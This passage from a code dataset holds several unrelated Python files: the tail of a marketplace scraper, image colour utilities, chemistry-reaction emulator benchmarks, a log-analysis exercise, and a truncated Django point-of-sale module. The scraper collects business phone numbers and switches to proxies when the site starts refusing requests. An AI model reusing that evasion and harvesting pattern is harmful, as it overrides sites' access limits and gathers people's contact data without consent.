urllib.request.urlopen(category_url) as url:\n html_doc = url.read()\n time.sleep(sleep+0.5)\n soup = BeautifulSoup(html_doc, 'html.parser')\n products = soup.find_all('div', class_='x-gallery-tile__content')\n for p in products:\n product_page = p.find('a', class_='x-image-holder').get('href')\n fetch_page(product_page)\n\n\ndef fetch_page(page_url):\n\n if debug:\n with open('debug/int_page.htm', encoding='utf-8') as url:\n html_doc = url.read()\n else:\n with urllib.request.urlopen(page_url) as url:\n html_doc = url.read()\n time.sleep(sleep)\n soup = BeautifulSoup(html_doc, 'html.parser')\n phones = soup.find_all('span', class_='js-product-ad-conv-action')\n try:\n numbers = phones[-1].attrs['data-pl-phones']\n except:\n numbers = None\n\n phone_numbers = []\n if numbers:\n json_numbers = json.loads(numbers)\n for number in json_numbers:\n phone_numbers.append(number.get('number'))\n\n try:\n title = soup.find('a', class_='x-company-info__name').get_text()\n except:\n title = None\n\n location = None\n side_panel = soup.find_all('span', class_='x-iconed-text__link')\n for l in side_panel:\n if l.attrs.get('data-qaid'):\n if l.attrs['data-qaid'] == 'company_location':\n location = l.get_text().strip()\n\n print('[>] {} \\n {} \\n {}'.format(title, location, phone_numbers))\n if save_to_mysql:\n save_to_db(title, location, phone_numbers)\n else:\n save_to_csv(title, location, phone_numbers)\n\n\ntoo_many_requests = False\ncollect_urls_from_category()\nfor page in all_pages():\n if page:\n print('[>] CATEGORY: {}'.format(page))\n try:\n if too_many_requests:\n install_proxy()\n fetch_category(page)\n remove_url_from_queue(page)\n except HTTPError:\n too_many_requests = True\n print('[!] Too many requests: switching to proxies. You can use https://www.tunnelbear.com/ instead')\n continue\n\n","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":6115,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"189796862","text":"import paddle\nfrom skimage import color\nimport numpy as np\nfrom PIL import Image\n\ndef convertLAB2RGB( lab ):\n lab[:, :, 0:1] = lab[:, :, 0:1] * 100 # [0, 1] -> [0, 100]\n lab[:, :, 1:3] = np.clip(lab[:, :, 1:3] * 255 - 128, -100, 100) # [0, 1] -> [-128, 128]\n rgb = color.lab2rgb( lab.astype(np.float64) )\n return rgb\n\ndef convertRGB2LABTensor( rgb ):\n lab = color.rgb2lab( np.asarray( rgb ) ) # RGB -> LAB L[0, 100] a[-127, 128] b[-128, 127]\n ab = np.clip(lab[:, :, 1:3] + 128, 0, 255) # AB --> [0, 255]\n ab = paddle.to_tensor(ab.astype('float32')) / 255.\n L = lab[:, :, 0] * 2.55 # L --> [0, 255]\n L = Image.fromarray( np.uint8( L ) )\n\n L = paddle.to_tensor(np.array(L).astype('float32')[..., np.newaxis] / 255.0)\n return L, ab\n\ndef addMergin(img, target_w, target_h, background_color=(0,0,0)):\n width, height = img.size\n if width==target_w and height==target_h:\n return img\n scale = max(target_w,target_h)/max(width, height)\n width = int(width*scale/16.)*16\n height = int(height*scale/16.)*16\n\n img = img.resize((width, height), Image.BICUBIC)\n xp = (target_w-width)//2\n yp = (target_h-height)//2\n result = Image.new(img.mode, (target_w, target_h), background_color)\n result.paste(img, (xp, yp))\n return result\n","sub_path":"applications/DeepRemaster/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1265,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"141241023","text":"import os\nimport os.path as 
osp\n\nfrom summit.experiment import Experiment\n\nimport numpy as np\n\nfrom summit.benchmarks.experiment_emulator.bnn_emulator import BNNEmulator\nfrom summit.utils.dataset import DataSet\nfrom summit.domain import *\nfrom summit.utils import jsonify_dict, unjsonify_dict\n\n\nclass ExperimentalEmulator(Experiment):\n \"\"\"Experimental Emulator\n\n Parameters\n ---------\n domain: summit.domain.Domain\n The domain of the experiment\n dataset: class:~summit.utils.dataset.DataSet, optional\n A DataSet with data for training where the data columns correspond to the domain and the data rows correspond to the training points.\n By default: None\n csv_dataset: string, optional\n Path to csv_file with data for training where columns correspond to the domain and the rows correspond to the training points.\n Note that the first row should exactly match the variable names of the domain and the second row should only have \"DATA\" as entry.\n By default: None\n model_name: string, optional\n Name of the model that is used for saving model parameters. Should be unique.\n By default: \"dataset_emulator_model_name\"\n regressor_type: string, optional\n Type of the regressor that is used within the emulator (available: \"BNN\").\n By default: \"BNN\"\n cat_to_descr: Boolean, optional\n If True, transform categorical variable to one or more continuous variable(s)\n corresponding to the descriptors of the categorical variable (else do nothing).\n By default: False\n\n Examples\n --------\n >>> test_domain = ReizmanSuzukiEmulator().domain\n >>> e = ExperimentalEmulator(domain=test_domain, model_name=\"Pytest\")\n No trained model for Pytest. Train this model with ExperimentalEmulator.train() in order to use this Emulator as an virtual Experiment.\n >>> columns = [v.name for v in e.domain.variables]\n >>> train_values = {(\"catalyst\", \"DATA\"): [\"P1-L2\", \"P1-L7\", \"P1-L3\", \"P1-L3\"], (\"t_res\", \"DATA\"): [60, 120, 110, 250], (\"temperature\", \"DATA\"): [110, 30, 70, 80], (\"catalyst_loading\", \"DATA\"): [0.508, 0.6, 1.4, 1.3], (\"yield\", \"DATA\"): [20, 40, 60, 34], (\"ton\", \"DATA\"): [33, 34, 21, 22]}\n >>> train_dataset = DataSet(train_values, columns=columns)\n >>> e.train(train_dataset, verbose=False, cv_fold=2, test_size=0.25)\n >>> columns = [v.name for v in e.domain.variables]\n >>> values = [float(v.bounds[0] + 0.6 * (v.bounds[1] - v.bounds[0])) if v.variable_type == 'continuous' else v.levels[-1] for v in e.domain.variables]\n >>> values = np.array(values)\n >>> values = np.atleast_2d(values)\n >>> conditions = DataSet(values, columns=columns)\n >>> results = e.run_experiments(conditions)\n\n \"\"\"\n\n def __init__(\n self,\n domain,\n dataset=None,\n csv_dataset=None,\n model_name=\"dataset_name_emulator_bnn\",\n regressor_type=\"BNN\",\n cat_to_descr=False,\n **kwargs\n ):\n super().__init__(domain)\n dataset = self._check_datasets(dataset, csv_dataset)\n\n kwargs[\"cat_to_descr\"] = cat_to_descr\n\n if regressor_type == \"BNN\":\n self.emulator = BNNEmulator(\n domain=domain, dataset=dataset, model_name=model_name, kwargs=kwargs\n )\n try:\n self.extras = [self.emulator._load_model(model_name)]\n except:\n print(\n \"No trained model for {}. 
Train this model with ExperimentalEmulator.train() in order to use this Emulator as an virtual Experiment.\".format(\n self.emulator.model_name\n )\n )\n else:\n raise NotImplementedError(\n \"Regressor type <{}> not implemented yet\".format(str(regressor_type))\n )\n\n def _run(self, conditions, **kwargs):\n condition = DataSet.from_df(conditions.to_frame().T)\n infer_dict = self.emulator.infer_model(dataset=condition)\n for k, v in infer_dict.items():\n conditions[(k, \"DATA\")] = v\n return conditions, None\n\n def train(self, dataset=None, csv_dataset=None, verbose=True, **kwargs):\n dataset = self._check_datasets(dataset, csv_dataset)\n self.emulator.set_training_hyperparameters(kwargs=kwargs)\n self.emulator.train_model(dataset=dataset, verbose=verbose, kwargs=kwargs)\n self.extras = [self.emulator.output_models]\n\n def validate(\n self,\n dataset=None,\n csv_dataset=None,\n parity_plots=False,\n get_pred=False,\n **kwargs\n ):\n dataset = self._check_datasets(dataset, csv_dataset)\n if dataset is not None:\n return self.emulator.validate_model(\n dataset=dataset,\n parity_plots=parity_plots,\n get_pred=get_pred,\n kwargs=kwargs,\n )\n else:\n try:\n print(\"Evaluation based on training and test set.\")\n return self.emulator.validate_model(parity_plots=parity_plots)\n except:\n raise ValueError(\"No dataset to evaluate.\")\n\n def _check_datasets(self, dataset=None, csv_dataset=None):\n if csv_dataset:\n if dataset:\n print(\n \"Dataset and csv.dataset are given, hence dataset will be overwritten by csv.data.\"\n )\n dataset = DataSet.read_csv(csv_dataset, index_col=None)\n return dataset\n\n def to_dict(self, **kwargs):\n \"\"\"Serialize the class to a dictionary\n\n Subclasses can add a experiment_params dictionary\n key with custom parameters for the experiment\n \"\"\"\n kwargs.update(\n dict(\n model_name=self.emulator.model_name,\n dataset=self.emulator._dataset.to_dict()\n if self.emulator._dataset is not None\n else None,\n output_models=self.emulator.output_models,\n )\n )\n return super().to_dict(**kwargs)\n\n @classmethod\n def from_dict(cls, d):\n dataset = d[\"experiment_params\"][\"dataset\"]\n d[\"experiment_params\"][\"dataset\"] = DataSet.from_dict(dataset)\n exp = super().from_dict(d)\n exp.emulator.output_models = d[\"experiment_params\"][\"output_models\"]\n return exp\n\n\nclass ReizmanSuzukiEmulator(ExperimentalEmulator):\n \"\"\"Reizman Suzuki Emulator\n\n Virtual experiments representing the Suzuki-Miyaura Cross-Coupling reaction\n similar to Reizman et al. (2016). Experimental outcomes are based on an\n emulator that is trained on the experimental data published by Reizman et al.\n\n Parameters\n ----------\n case: int, optional, default=1\n Reizman et al. (2016) reported experimental data for 4 different\n cases. The case number refers to the cases they reported.\n Please see their paper for more information on the cases.\n\n Examples\n --------\n >>> reizman_emulator = ReizmanSuzukiEmulator(case=1)\n\n Notes\n -----\n This benchmark is based on data from [Reizman]_ et al.\n\n References\n ----------\n .. [Reizman] B. J. Reizman et al., React. Chem. 
Eng., 2016, 1, 658–666.\n DOI: `10.1039/C6RE00153J `_.\n\n \"\"\"\n\n def __init__(self, case=1, **kwargs):\n model_name = \"reizman_suzuki_case\" + str(case)\n domain = self.setup_domain()\n dataset_file = osp.join(\n osp.dirname(osp.realpath(__file__)),\n \"experiment_emulator/data/\" + model_name + \"_train_test.csv\",\n )\n super().__init__(domain=domain, model_name=model_name)\n\n def setup_domain(self):\n domain = Domain()\n\n # Decision variables\n des_1 = \"Catalyst type - different ligands\"\n domain += CategoricalVariable(\n name=\"catalyst\",\n description=des_1,\n levels=[\n \"P1-L1\",\n \"P2-L1\",\n \"P1-L2\",\n \"P1-L3\",\n \"P1-L4\",\n \"P1-L5\",\n \"P1-L6\",\n \"P1-L7\",\n ],\n )\n\n des_2 = \"Residence time in seconds (s)\"\n domain += ContinuousVariable(name=\"t_res\", description=des_2, bounds=[60, 600])\n\n des_3 = \"Reactor temperature in degrees Celsius (ºC)\"\n domain += ContinuousVariable(\n name=\"temperature\", description=des_3, bounds=[30, 110]\n )\n\n des_4 = \"Catalyst loading in mol%\"\n domain += ContinuousVariable(\n name=\"catalyst_loading\", description=des_4, bounds=[0.5, 2.5]\n )\n\n # Objectives\n des_5 = (\n \"Turnover number - moles product generated divided by moles catalyst used\"\n )\n domain += ContinuousVariable(\n name=\"ton\",\n description=des_5,\n bounds=[0, 200], # TODO: not sure about bounds, maybe redefine\n is_objective=True,\n maximize=False,\n )\n\n des_6 = \"Yield\"\n domain += ContinuousVariable(\n name=\"yield\",\n description=des_6,\n bounds=[0, 100],\n is_objective=True,\n maximize=True,\n )\n\n return domain\n\n def to_dict(self):\n \"\"\"Serialize the class to a dictionary\"\"\"\n experiment_params = dict(\n case=self.emulator.model_name[-1],\n )\n return super().to_dict(**experiment_params)\n\n\nclass BaumgartnerCrossCouplingEmulator(ExperimentalEmulator):\n \"\"\"Baumgartner Cross Coupling Emulator\n\n Virtual experiments representing the Aniline Cross-Coupling reaction\n similar to Baumgartner et al. (2019). Experimental outcomes are based on an\n emulator that is trained on the experimental data published by Baumgartner et al.\n\n This is a five dimensional optimisation of temperature, residence time, base equivalents,\n catalyst and base.\n\n The categorical variables (catalyst and base) contain descriptors\n calculated using COSMO-RS. Specifically, the descriptors are the first two sigma moments.\n\n Examples\n --------\n >>> bemul = BaumgartnerCrossCouplingDescriptorEmulator()\n\n Notes\n -----\n This benchmark is based on data from [Baumgartner]_ et al.\n\n References\n ----------\n\n .. [Baumgartner] L. M. Baumgartner et al., Org. Process Res. 
Dev., 2019, 23, 1594–1601\n DOI: `10.1021/acs.oprd.9b00236 `_\n\n \"\"\"\n\n def __init__(self, **kwargs):\n model_name = kwargs.get(\"model_name\", \"baumgartner_aniline_cn_crosscoupling\")\n dataset_file = kwargs.get(\n \"dataset_file\", \"baumgartner_aniline_cn_crosscoupling.csv\"\n )\n domain = self.setup_domain()\n dataset_file = osp.join(\n osp.dirname(osp.realpath(__file__)),\n \"experiment_emulator/data/\" + dataset_file,\n )\n super().__init__(domain=domain, csv_dataset=dataset_file, model_name=model_name)\n\n def setup_domain(self):\n domain = Domain()\n\n # Decision variables\n des_1 = \"Catalyst type\"\n catalyst_df = DataSet(\n [\n [460.7543, 67.2057], # 30.8413, 2.3043, 0], #, 424.64, 421.25040226],\n [518.8408, 89.8738], # 39.4424, 2.5548, 0], #, 487.7, 781.11247064],\n [819.933, 129.0808], # 83.2017, 4.2959, 0], #, 815.06, 880.74916884],\n ],\n index=[\"tBuXPhos\", \"tBuBrettPhos\", \"AlPhos\"],\n columns=[\n \"area_cat\",\n \"M2_cat\",\n ], # , 'M3_cat', 'Macc3_cat', 'Mdon3_cat'] #,'mol_weight', 'sol']\n )\n domain += CategoricalVariable(\n name=\"catalyst\",\n description=des_1,\n levels=[\"tBuXPhos\", \"tBuBrettPhos\", \"AlPhos\"],\n descriptors=catalyst_df,\n )\n\n des_2 = \"Base\"\n base_df = DataSet(\n [\n [162.2992, 25.8165], # 40.9469, 3.0278, 0], #101.19, 642.2973283],\n [\n 165.5447,\n 81.4847,\n ], # 107.0287, 10.215, 0.0169], # 115.18, 534.01544123],\n [227.3523, 30.554], # 14.3676, 1.1196, 0.0127], # 171.28, 839.81215],\n [192.4693, 59.8367], # 82.0661, 7.42, 0], # 152.24, 1055.82799],\n ],\n index=[\"TEA\", \"TMG\", \"BTMG\", \"DBU\"],\n columns=[\"area\", \"M2\"], # , 'M3', 'Macc3', 'Mdon3'], # 'mol_weight', 'sol']\n )\n domain += CategoricalVariable(\n name=\"base\",\n description=des_2,\n levels=[\"DBU\", \"BTMG\", \"TMG\", \"TEA\"],\n descriptors=base_df\n )\n\n des_3 = \"Base equivalents\"\n domain += ContinuousVariable(\n name=\"base_equivalents\", description=des_3, bounds=[1.0, 2.5]\n )\n\n des_4 = \"Temperature in degrees Celsius (ºC)\"\n domain += ContinuousVariable(\n name=\"temperature\", description=des_4, bounds=[30, 100]\n )\n\n des_5 = \"residence time in seconds (s)\"\n domain += ContinuousVariable(name=\"t_res\", description=des_5, bounds=[60, 1800])\n\n des_6 = \"Yield\"\n domain += ContinuousVariable(\n name=\"yld\",\n description=des_6,\n bounds=[0.0, 1.0],\n is_objective=True,\n maximize=True,\n )\n\n return domain\n\n\nclass BaumgartnerCrossCouplingDescriptorEmulator(ExperimentalEmulator):\n \"\"\"Baumgartner Cross Coupling Emulator\n\n Virtual experiments representing the Aniline Cross-Coupling reaction\n similar to Baumgartner et al. (2019). Experimental outcomes are based on an\n emulator that is trained on the experimental data published by Baumgartner et al.\n\n The difference with this model is that it uses descriptors for the catalyst and base\n instead of one-hot encoding the options. The descriptors are the first two\n sigma moments from COSMO-RS.\n\n\n Parameters\n ----------\n\n Examples\n --------\n >>> bemul = BaumgartnerCrossCouplingDescriptorEmulator()\n\n Notes\n -----\n This benchmark is based on data from [Baumgartner]_ et al.\n\n References\n ----------\n\n .. [Baumgartner] L. M. Baumgartner et al., Org. Process Res. 
Dev., 2019, 23, 1594–1601\n DOI: `10.1021/acs.oprd.9b00236 `_\n\n \"\"\"\n\n def __init__(self, **kwargs):\n model_name = kwargs.get(\n \"model_name\", \"baumgartner_aniline_cn_crosscoupling_descriptors\"\n )\n dataset_file = kwargs.get(\n \"dataset_file\", \"baumgartner_aniline_cn_crosscoupling_descriptors.csv\"\n )\n domain = self.setup_domain()\n dataset_file = osp.join(\n osp.dirname(osp.realpath(__file__)),\n \"experiment_emulator/data/\" + dataset_file,\n )\n super().__init__(domain=domain, csv_dataset=dataset_file, model_name=model_name)\n\n def setup_domain(self):\n domain = Domain()\n\n # Decision variables\n des_1 = \"Catalyst type with descriptors\"\n catalyst_df = DataSet(\n [\n [460.7543, 67.2057, 30.8413, 2.3043, 0], # , 424.64, 421.25040226],\n [518.8408, 89.8738, 39.4424, 2.5548, 0], # , 487.7, 781.11247064],\n [819.933, 129.0808, 83.2017, 4.2959, 0], # , 815.06, 880.74916884],\n ],\n index=[\"tBuXPhos\", \"tBuBrettPhos\", \"AlPhos\"],\n columns=[\n \"area_cat\",\n \"M2_cat\",\n \"M3_cat\",\n \"Macc3_cat\",\n \"Mdon3_cat\",\n ], # ,'mol_weight', 'sol']\n )\n domain += CategoricalVariable(\n name=\"catalyst\", description=des_1, descriptors=catalyst_df\n )\n\n des_2 = \"Base type with descriptors\"\n base_df = DataSet(\n [\n [162.2992, 25.8165, 40.9469, 3.0278, 0], # 101.19, 642.2973283],\n [165.5447, 81.4847, 107.0287, 10.215, 0.0169], # 115.18, 534.01544123],\n [227.3523, 30.554, 14.3676, 1.1196, 0.0127], # 171.28, 839.81215],\n [192.4693, 59.8367, 82.0661, 7.42, 0], # 152.24, 1055.82799],\n ],\n index=[\"TEA\", \"TMG\", \"BTMG\", \"DBU\"],\n columns=[\"area\", \"M2\", \"M3\", \"Macc3\", \"Mdon3\"], # 'mol_weight', 'sol']\n )\n domain += CategoricalVariable(\n name=\"base\", description=des_2, descriptors=base_df\n )\n\n des_3 = \"Base equivalents\"\n domain += ContinuousVariable(\n name=\"base_equivalents\", description=des_3, bounds=[1.0, 2.5]\n )\n\n des_4 = \"Temperature in degrees Celsius (ºC)\"\n domain += ContinuousVariable(\n name=\"temperature\", description=des_4, bounds=[30, 100]\n )\n\n des_5 = \"residence time in seconds (s)\"\n domain += ContinuousVariable(name=\"t_res\", description=des_5, bounds=[60, 1800])\n\n des_6 = \"Yield\"\n domain += ContinuousVariable(\n name=\"yield\",\n description=des_6,\n bounds=[0.0, 1.0],\n is_objective=True,\n maximize=True,\n )\n\n return domain\n\n\nclass BaumgartnerCrossCouplingEmulator_Yield_Cost(BaumgartnerCrossCouplingEmulator):\n \"\"\"Baumgartner Cross Coupling Emulator\n\n Virtual experiments representing the Aniline Cross-Coupling reaction\n similar to Baumgartner et al. (2019). Experimental outcomes are based on an\n emulator that is trained on the experimental data published by Baumgartner et al.\n\n This is a multiobjective version for optimizing yield and cost simultaneously.\n\n Parameters\n ----------\n\n Examples\n --------\n >>> bemul = BaumgartnerCrossCouplingDescriptorEmulator()\n\n Notes\n -----\n This benchmark is based on data from [Baumgartner]_ et al.\n\n References\n ----------\n\n .. [Baumgartner] L. M. Baumgartner et al., Org. Process Res. 
Dev., 2019, 23, 1594–1601\n DOI: `10.1021/acs.oprd.9b00236 `_\n\n \"\"\"\n\n def __init__(self, **kwargs):\n super().__init__()\n self.init_domain = self._domain\n self.mod_domain = self._domain + ContinuousVariable(\n name=\"cost\",\n description=\"cost in USD of 40 uL reaction\",\n bounds=[0.0, 1.0],\n is_objective=True,\n maximize=False,\n )\n self._domain = self.mod_domain\n\n def _run(self, conditions, **kwargs):\n # Change to original domain for running predictive model\n self._domain = self.init_domain\n conditions, _ = super()._run(conditions=conditions, **kwargs)\n\n # Calculate costs\n costs = self._calculate_costs(conditions)\n conditions[(\"cost\", \"DATA\")] = costs\n\n # Change back to modified domain\n self._domain = self.mod_domain\n return conditions, {}\n\n @classmethod\n def _calculate_costs(cls, conditions):\n catalyst = conditions[\"catalyst\"].values\n base = conditions[\"base\"].values\n base_equiv = conditions[\"base_equivalents\"].values\n\n # Calculate amounts\n droplet_vol = 40 * 1e-3 # mL\n mmol_triflate = 0.91 * droplet_vol\n mmol_anniline = 1.6 * mmol_triflate\n catalyst_equiv = {\n \"tBuXPhos\": 0.0095,\n \"tBuBrettPhos\": 0.0094,\n \"AlPhos\": 0.0094,\n }\n mmol_catalyst = [catalyst_equiv[c] * mmol_triflate for c in catalyst]\n mmol_base = base_equiv * mmol_triflate\n\n # Calculate costs\n cost_triflate = mmol_triflate * 5.91 # triflate is $5.91/mmol\n cost_anniline = mmol_anniline * 0.01 # anniline is $0.01/mmol\n cost_catalyst = np.array(\n [cls._get_catalyst_cost(c, m) for c, m in zip(catalyst, mmol_catalyst)]\n )\n cost_base = np.array(\n [cls._get_base_cost(b, m) for b, m in zip(base, mmol_base)]\n )\n tot_cost = cost_triflate + cost_anniline + cost_catalyst + cost_base\n if len(tot_cost) == 1:\n tot_cost = tot_cost[0]\n return tot_cost\n\n @staticmethod\n def _get_catalyst_cost(catalyst, catalyst_mmol):\n catalyst_prices = {\n \"tBuXPhos\": 94.08,\n \"tBuBrettPhos\": 182.85,\n \"AlPhos\": 594.18,\n }\n return float(catalyst_prices[catalyst] * catalyst_mmol)\n\n @staticmethod\n def _get_base_cost(base, mmol_base):\n # prices in $/mmol\n base_prices = {\n \"DBU\": 0.03,\n \"BTMG\": 1.2,\n \"TMG\": 0.001,\n \"TEA\": 0.01,\n }\n return float(base_prices[base] * mmol_base)\n","sub_path":"summit/benchmarks/experimental_emulator.py","file_name":"experimental_emulator.py","file_ext":"py","file_size_in_byte":20632,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"418405016","text":"# isinstance dir opera\n# date: 2019/08/14\n\n\n# if type('hello') == str:\n# print('True')\n# else:\n# print('False')\n#\n#\n# if isinstance('hello', str):\n# print(\"True\")\n# else:\n# print(False)\n#\n#\n# if isinstance('world', (list, tuple, str)):\n# print(True)\n# else:\n# print(False)\n#\n\nclass Analysislog:\n def __init__(self, logPath):\n self.__path = logPath\n\n def getStatusCode(self):\n statusCode = {}\n with open(self.__path, 'r', encoding='utf8') as logfile:\n for lines in logfile:\n key = lines.split(\"=\")[10].split()[0]\n if key in ('200', '302', '304', '404', '502', '503', '504'):\n statusCode.setdefault(key, 0)\n statusCode[key] += 1\n return statusCode\n\n def getVpu(self):\n ips, info = [], 'pv: {:d} uv: {:d}'\n with open(self.__path, 'r', encoding='utf8') as logfile:\n for lines in logfile:\n ips.append(lines.split(\"=\")[3].split()[0])\n return info.format(len(ips), len(set(ips)))\n\n def getNatural(self):\n natural = {}\n with open(self.__path, 'r', encoding='utf8') as logfile:\n for lines in logfile:\n 
key = lines.split()[-2]\n natural.setdefault(key, 0)\n natural[key] += 1\n return natural\n\n\nl = dir(Analysislog)\nif 'getVpu' in l:\n print()\nelse:\n pass\n\nlog = Analysislog('./access_log')\n\nprint(isinstance(log, Analysislog))\n","sub_path":"02.pythonbasis/08.oop_inhert/04.isinstance_dir.py","file_name":"04.isinstance_dir.py","file_ext":"py","file_size_in_byte":1487,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"65700746","text":"from __future__ import absolute_import\nfrom celery import shared_task\nfrom celery import group, chain\nfrom switch.celery import app\nfrom celery.utils.log import get_task_logger\nfrom switch.celery import single_instance_task\n\nfrom django.shortcuts import render\nfrom django.utils import timezone\nfrom django.utils.timezone import utc\nfrom django.contrib.gis.geos import Point\nfrom django.db import IntegrityError\nimport simplejson as json\nimport pytz, time, os, random, string\nfrom django.utils.timezone import localtime\nfrom datetime import datetime\nfrom decimal import Decimal, ROUND_DOWN, ROUND_UP\nimport base64, re\nfrom django.core.files import File\nfrom django.db.models import Count, Sum\nfrom django.db import transaction\nimport numpy as np\nfrom django.db.models import Q, F\nimport operator\n#from secondary.channels.notify.mqtt import MqttServerClient\nfrom django.core.serializers.json import DjangoJSONEncoder\nfrom django.core import serializers\n\nfrom primary.core.administration.views import WebService\nfrom primary.core.api.views import Authorize\n\nfrom secondary.erp.pos.models import *\n\nimport logging\nlgr = logging.getLogger('secondary.erp.pos')\n\n\nclass Wrappers:\n\tdef bill_entry(self, item, purchase_order, balance_bf, payload):\n\t\tpurchase_order.cart_item.add(item)\n\n\n\t\ttransaction_reference = payload['bridge__transaction_id'] if 'bridge__transaction_id' in payload.keys() else None\n\n\t\t#ADD to Bill Manager for Payment deductions\n\t\tbill_manager = BillManager(credit=False,transaction_reference=transaction_reference,\\\n\t\t\t\taction_reference=payload['action_id'],order=purchase_order,amount=item.total,\\\n\t\t\t\tbalance_bf=balance_bf)\n\n\t\tbill_manager.save()\n\n\t\treturn bill_manager\n\n\n\tdef get_balance_bf(self, item, purchase_order, balance_bf):\n\t\tif item.currency == purchase_order.currency:\n\t\t\tbalance_bf = balance_bf + item.total\n\t\telse:\n\t\t\tforex = Forex.objects.filter(base_currency=purchase_order.currency, quote_currency=item.currency)\n\t\t\ttotal = Decimal(0)\n\t\t\tif forex.exists():\n\t\t\t\ttotal = item.total/forex[0].exchange_rate\n\n\t\t\tbalance_bf = balance_bf + total\n\t\t\tlgr.info('Forex Calculate balance_bf to %s|from: %s| %s' % (purchase_order.currency, item.currency, balance_bf) )\n\n\t\treturn balance_bf\n\n\n\tdef cart_update(self, cart_item, payload, quantity, sub_total, total):\n\n\t\tcart_item.quantity=quantity\n\t\tcart_item.sub_total=sub_total\n\t\tcart_item.total=total\n\t\tcart_item.details=self.transaction_payload(payload)\n\n\t\tcart_item.save()\n\n\t\treturn cart_item\n\n\n\tdef cart_entry(self, product_item, payload, quantity, sub_total, total):\n\t\tsession_gateway_profile = None\n\t\tstatus = CartStatus.objects.get(name='UNPAID')\n\n\t\tchannel = Channel.objects.get(id=payload['chid'])\n\n\t\tcart_item = 
CartItem(product_item=product_item,currency=product_item.currency,\\\n\t\t\tstatus=status,quantity=quantity,price=product_item.unit_cost,sub_total=sub_total,total=total,\\\n\t\t\tdetails=self.transaction_payload(payload), channel=channel)\n\n\t\tif 'session_gateway_profile_id' in payload.keys():\n\t\t\tsession_gateway_profile = GatewayProfile.objects.get(id=payload['session_gateway_profile_id'])\n\t\telse:\n\t\t\tsession_gateway_profile = GatewayProfile.objects.get(id=payload['gateway_profile_id'])\n\n\n\t\tcart_item.gateway_profile = session_gateway_profile\n\t\tif session_gateway_profile.institution == product_item.institution:\n\t\t\tcart_item.cart_type = CartType.objects.get(name='POS')\n\t\telse:\n\t\t\tcart_item.cart_type = CartType.objects.get(name='SHOP')\n\n\t\tif 'csrf_token' in payload.keys():\n\t\t\tcart_item.token = payload['csrf_token']\n\t\telif 'csrfmiddlewaretoken' in payload.keys():\n\t\t\tcart_item.token = payload['csrfmiddlewaretoken']\n\t\telif \"token\" in payload.keys():\n\t\t\tcart_item.token = payload['token']\n\n\t\tif 'callback_url' in payload.keys():\n\t\t\tcart_item.api_callback_url = payload['callback_url']\n\t\t\tcart_item.api_callback_status = APICallBackStatus.objects.get(name='CREATED')\n\t\t\tcart_item.api_gateway_profile = GatewayProfile.objects.get(id=payload['gateway_profile_id'])\n\n\t\tcart_item.save()\n\n\t\treturn cart_item\n\n\tdef sale_charge_item(self, balance_bf, item, payload, gateway):\n\t\t#Sale Charge Item Bill entry\n\t\tsale_charge_item = None\n\t\tsale_charge = SaleCharge.objects.filter(Q(min_amount__lt=balance_bf,max_amount__gt=balance_bf,credit=False),\\\n\t\t\t\t\t\tQ(Q(product_display=item.product_item.product_display)|Q(product_display=None)),\\\n\t\t\t\t\t\tQ(Q(product_type=item.product_item.product_type)|Q(product_type=None)),\\\n\t\t\t\t\t\tQ(Q(institution=item.product_item.institution)|Q(institution=None)),\\\n\t\t\t\t\t\tQ(Q(gateway=gateway)|Q(gateway=None)))\n\t\tfor sc in sale_charge:\n\n\t\t\tcharge = Decimal(0)\n\n\t\t\tif 'delivery_location_coord' in payload.keys():\n\t\t\t\tcoordinates = payload['delivery_location_coord']\n\t\t\t\tlongitude, latitude = coordinates.split(',', 1)\n\t\t\t\ttrans_point = Point(float(longitude), float(latitude))\n\t\t\t\tdistance = sc.main_location.distance(trans_point)\n\t\t\t\tdistance_in_km = Decimal(distance) * Decimal(100)\n\t\t\t\tif sc.min_distance<=distance_in_km and sc.max_distance>distance_in_km:\n\t\t\t\t\tcharge = (sc.charge_per_km * distance_in_km) + sc.charge_value\n\n\t\t\tproduct_item = sc.sale_charge_type.product_item\n\n\t\t\tif sc.is_percentage:\n\t\t\t\tcharge = charge + ((sc.charge_value/100)*Decimal(item.total))\n\t\t\telse:\n\t\t\t\tcharge = charge+sc.charge_value\n\n\t\t\tif sc.per_item:\n\t\t\t\tsale_charge_item = self.cart_entry(sc.sale_charge_type.product_item, payload, 1, charge, charge)\n\t\t\t\t#sale_charge_item = CartItem.objects.get(id=cart_item_id)\n\n\t\t\telse:\n\t\t\t\tsale_charge_exists = False\n\t\t\t\tif item.gateway_profile:\n\t\t\t\t\tsale_charge_items = CartItem.objects.filter(gateway_profile=item.gateway_profile, product_item=product_item)\n\t\t\t\t\tsale_charge_exists = sale_charge_items.exists()\n\t\t\t\telse:\n\t\t\t\t\tsale_charge_items = CartItem.objects.filter(token=item.token, product_item=product_item)\n\t\t\t\t\tsale_charge_exists = sale_charge_items.exists()\n\n\t\t\t\tif sale_charge_exists:\n\t\t\t\t\t#sale_charge_item = sale_charge_items[0]\n\t\t\t\t\tsale_charge_item = self.cart_update(sale_charge_items[0], payload, 1, charge, 
charge)\n\t\t\t\telse:\n\t\t\t\t\tsale_charge_item = self.cart_entry(sc.sale_charge_type.product_item, payload, 1, charge, charge)\n\t\t\t\t\t#sale_charge_item = CartItem.objects.get(id=cart_item_id)\n\n\t\treturn sale_charge_item\n\n\n\tdef sale_charge_bill_entry(self, balance_bf, item, payload, purchase_order, gateway):\n\t\tsale_charge_item = self.sale_charge_item(balance_bf, item, payload, gateway)\n\t\tif sale_charge_item:\n\t\t\tbalance_bf = self.get_balance_bf(sale_charge_item, purchase_order, balance_bf)\n\t\t\tbill_manager = self.bill_entry(sale_charge_item, purchase_order, balance_bf, payload)\n\t\treturn balance_bf\n\n\n\tdef sale_charge_bill(self, balance_bf, item, payload, purchase_order, gateway):\n\t\t#Sale Charge Item Bill entry\n\t\tsale_charge = 